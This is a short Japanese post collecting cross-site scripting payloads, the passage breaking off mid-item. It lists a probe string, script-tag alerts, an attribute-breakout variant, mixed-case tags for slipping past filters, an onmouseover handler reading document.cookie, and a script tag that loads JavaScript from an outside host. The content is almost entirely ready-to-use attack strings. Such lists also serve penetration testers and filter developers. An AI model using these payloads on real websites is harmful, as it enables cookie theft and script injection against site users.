XSSパターン(暫定版) XSSのパターンを幾つか集めてみました。出典は下の方にあります。 1.'';!--"<XSS>=&{()}``\" テスト文字列。まずはこの文字列を突っ込む。 2.<script>alert(1);</script> 単純なパターン 3."><script>alert(1);</script> 単純なパターン2 4.<script src=http://nootropic.me/xss.js></script> ダブルクォートやシングルクォートが使えない際 5.<ScrIpt>alert(1);</SCript> 単純にscriptタグが禁止されている際に使用出来る。他のタグでも使うことが出来る。 6.<a onmouseover="alert(document.cookie)">XSS</a> aタグを使用したXSS。 7.<a onmouseover=aler